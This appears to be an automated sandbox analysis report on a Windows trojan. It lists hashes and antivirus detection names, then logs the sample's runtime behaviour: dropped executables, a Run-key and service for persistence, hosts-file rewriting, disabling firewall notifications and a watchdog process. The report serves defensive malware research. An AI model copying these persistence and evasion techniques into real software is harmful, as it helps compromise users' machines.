Analysis Date: 2015-07-27 09:05:13
MD5: 29c4a3c13d0695d8b767a5fdb4709df8
SHA1: 05466a9e467d28bd56116475a1ef67d6fb9fe2c7

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .text md5: d7a029bb6b4500153510086d61805d68 sha1: 05f87727b561afca905c9c9d20b4dbe603657ff5 size: 793088
Section: .rdata md5: bdfd79c5777dc18ea1ff849f173c8195 sha1: 42aa1df7031e1a141e44c28518bb09254e4122af size: 60928
Section: .data md5: 7b6360ed06718ba780509d4caa94db87 sha1: bc1a7c5daf0f6a27a3d334d822fadcb2a54ede62 size: 412160
Timestamp: 2014-10-30 00:23:42
Packer: Microsoft Visual C++ ?.?
PEhash: 589c2f91dad9cfa7e01c78608fc6a3299e4cdaf4
IMPhash: b3064163ae5d739a760f81326e4c5133
AV Alwil (avast): Downloader-TLD [Trj]
AV Emsisoft: Gen:Variant.Symmi.22722
AV BullGuard: Gen:Variant.Symmi.22722
AV ClamAV: no_virus
AV F-Secure: Gen:Variant.Symmi.22722
AV VirusBlokAda (vba32): no_virus
AV Dr. Web: Trojan.KillFiles.27819
AV Microsoft Security Essentials: TrojanSpy:Win32/Nivdort.AE
AV Fortinet: W32/Kryptik.DDQD!tr
AV Zillya!: no_virus
AV Authentium: W32/Nivdort.A.gen!Eldorado
AV Twister: no_virus
AV Grisoft (avg): Win32/Cryptor
AV MicroWorld (escan): Gen:Variant.Symmi.22722
AV Mcafee: no_virus
AV Avira (antivir): TR/Crypt.ZPACK.133852
AV CAT (quickheal): Trojan.Generic.g3
AV Kaspersky: Trojan.Win32.Generic
AV Ikarus: Trojan.Win32.Crypt
AV Arcabit (arcavir): Gen:Variant.Symmi.22722
AV Padvish: no_virus
AV Frisk (f-prot): no_virus
AV CA (E-Trust Ino): no_virus
AV Symantec: Downloader.Upatre!g15
AV Ad-Aware: Gen:Variant.Symmi.22722
AV Eset (nod32): Win32/Kryptik.CCLE
AV MalwareBytes: no_virus
AV BitDefender: Gen:Variant.Symmi.22722
AV Rising: no_virus
AV K7: Trojan ( 0049a7ec1 )
AV Trend Micro: TROJ_WONTON.SMJ1

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\rys2jcn1l5qqknxioeihs.exe
Creates File: C:\WINDOWS\system32\cwpxomnzp\tst
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\rys2jcn1l5qqknxioeihs.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\rys2jcn1l5qqknxioeihs.exe

Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\DLL Volume WebClient Device WinHTTP ➝ C:\WINDOWS\system32\ygbrqee.exe
Creates File: C:\WINDOWS\system32\cwpxomnzp\lck
Creates File: C:\WINDOWS\system32\drivers\etc\hosts
Creates File: C:\WINDOWS\system32\cwpxomnzp\tst
Creates File: C:\WINDOWS\system32\ygbrqee.exe
Creates File: C:\WINDOWS\system32\cwpxomnzp\etc
Deletes File: C:\WINDOWS\system32\\drivers\etc\hosts
Creates Process: C:\WINDOWS\system32\ygbrqee.exe
Creates Service: Experience Update TP Internet Cache - C:\WINDOWS\system32\ygbrqee.exe

Process
↳ C:\WINDOWS\system32\svchost.exe

Process
↳ Pid 808

Process
↳ Pid 856

Process
↳ C:\WINDOWS\System32\svchost.exe

Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM\List of event-active namespaces ➝ NULL
Creates File: PIPE\lsarpc
Creates File: C:\WINDOWS\system32\WBEM\Repository\$WinMgmt.CFG
Creates File: C:\WINDOWS\system32\WBEM\Logs\wbemess.log

Process
↳ Pid 1212

Process
↳ C:\WINDOWS\system32\spoolsv.exe

Registry: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\BeepEnabled ➝ NULL
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\Print\TypesSupported ➝ 7
Registry: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\Printers\SymbolicLinkValue ➝ NULL
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Print\Printers\DefaultSpoolDirectory ➝ C:\WINDOWS\System32\spool\PRINTERS\\x00
Creates File: WMIDataDevice

Process
↳ Pid 1872

Process
↳ Pid 1140

Process
↳ C:\WINDOWS\system32\ygbrqee.exe

Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Security Center\FirewallDisableNotify ➝ 1
Creates File: C:\WINDOWS\system32\cwpxomnzp\lck
Creates File: C:\WINDOWS\system32\cwpxomnzp\rng
Creates File: C:\WINDOWS\system32\cwpxomnzp\run
Creates File: C:\WINDOWS\system32\zclyqmiiee.exe
Creates File: pipe\net\NtControlPipe10
Creates File: C:\WINDOWS\TEMP\rys2jcn1rumqkn.exe
Creates File: C:\WINDOWS\system32\cwpxomnzp\tst
Creates File: C:\WINDOWS\system32\cwpxomnzp\cfg
Creates File: \Device\Afd\Endpoint
Creates Process: C:\WINDOWS\TEMP\rys2jcn1rumqkn.exe -r 42951 tcp
Creates Process: WATCHDOGPROC "c:\windows\system32\ygbrqee.exe"

Process
↳ C:\WINDOWS\system32\ygbrqee.exe

Creates File: C:\WINDOWS\system32\cwpxomnzp\tst

Process
↳ WATCHDOGPROC "c:\windows\system32\ygbrqee.exe"

Creates File: C:\WINDOWS\system32\cwpxomnzp\tst

Process
↳ C:\WINDOWS\TEMP\rys2jcn1rumqkn.exe -r 42951 tcp

Creates File: \Device\Afd\Endpoint
Winsock DNS: 239.255.255.250

Network Details:


Raw Pcap

Strings